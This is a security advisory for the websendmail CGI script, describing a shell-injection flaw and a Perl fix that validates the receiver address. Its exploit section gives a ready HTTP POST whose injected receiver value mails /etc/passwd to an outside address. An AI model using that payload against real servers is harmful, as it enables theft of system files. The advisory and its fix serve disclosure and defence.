COMMAND

    websendmail

SYSTEMS AFFECTED

    Systems running that CGI

PROBLEM

    Websendmail is a cgi-bin that comes with the WEBgais package, which
    is an interface to the GAIS search tool.  It is a PERL script that
    reads input from a form and sends e-mail to the specified
    destination.  The version referred to here is 1.0.  It was released
    in 1995 but it is still used.

    Like many other cgi-bin programs, this one does not check for shell
    special characters in the user input.  Here's what it does:

        (...)
        $cmd="| $MAILBIN $VAR_receiver";
        open (PIPEOUT, $cmd);

    $VAR_receiver is read from the form.  The script also does a little
    parsing on the string to "un-webify" it (converts pluses to spaces
    and %xx characters to their real value).  So if we set
    $VAR_receiver to:

        ';mail+your_address\@somewhere.org</etc/passwd;'

    it will do the job.  Now for the exploit:

        telnet target.machine.com 80
        POST /cgi-bin/websendmail HTTP/1.0
        Content-length: xxx (should be replaced with the actual length
        of the string passed to the server, in this case xxx=90)

        receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
        &content=a

    Don't worry if the server displays an error message.  The password
    file is on the way.  You can use anything for the "sender",
    "rtnaddr", "subject" and "content", just make sure they're there,
    the script checks for them.

    Credit goes to Razvan Dragomirescu.

SOLUTION

    Modify the source so that the form input is validated and shell
    special characters never reach the pipe command.
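    The following is an added illustration of that fix, not code from
    the WEBgais package: it un-webifies the receiver field the way the
    advisory describes, accepts only a plain address built from a fixed
    character set, and opens the mail pipe in list form so no shell ever
    parses the address.  The $MAILBIN path is assumed, since the
    original script's value is not shown above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed sendmail path; the original script's $MAILBIN is not shown.
my $MAILBIN = '/usr/lib/sendmail';

# Un-webify one form value as the advisory describes:
# pluses become spaces and %xx escapes become bytes.
sub unwebify {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Accept only a single local-part@domain address from a fixed character
# set, not starting with '-' (so it cannot be read as a sendmail option).
# Anything else, e.g. the ';mail ... </etc/passwd;' string above, is
# rejected.  Returns the clean address, or undef.  Under -T the capture
# would also untaint it.
sub safe_receiver {
    my ($raw) = @_;
    my $addr = unwebify($raw);
    return undef if length($addr) > 254;
    if ($addr =~ /^([A-Za-z0-9][A-Za-z0-9._-]*@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)$/) {
        return $1;
    }
    return undef;
}

# Vulnerable pattern from the script (never do this with user input):
#   $cmd = "| $MAILBIN $VAR_receiver"; open(PIPEOUT, $cmd);
# Safe pattern: validate first, then use the 4-argument list-form open
# (Perl 5.8+), which execs $MAILBIN directly without /bin/sh.
sub open_mailer {
    my ($raw_receiver) = @_;
    my $to = safe_receiver($raw_receiver)
        or die "websendmail: invalid receiver address\n";
    open(my $pipe, '|-', $MAILBIN, $to)
        or die "websendmail: cannot run $MAILBIN: $!\n";
    return $pipe;
}

# Demonstration when run as a script: one valid address, one rejected.
if (!caller) {
    for my $r ('user@example.org',
               ';mail+your_address\@somewhere.org</etc/passwd;') {
        my $ok = safe_receiver($r);
        printf "%-48s => %s\n", $r, defined $ok ? "accepted ($ok)" : 'rejected';
    }
}
```

    A web server log entry whose receiver field fails safe_receiver() is
    the signal to alert on; the script should never reach open_mailer()
    with such input.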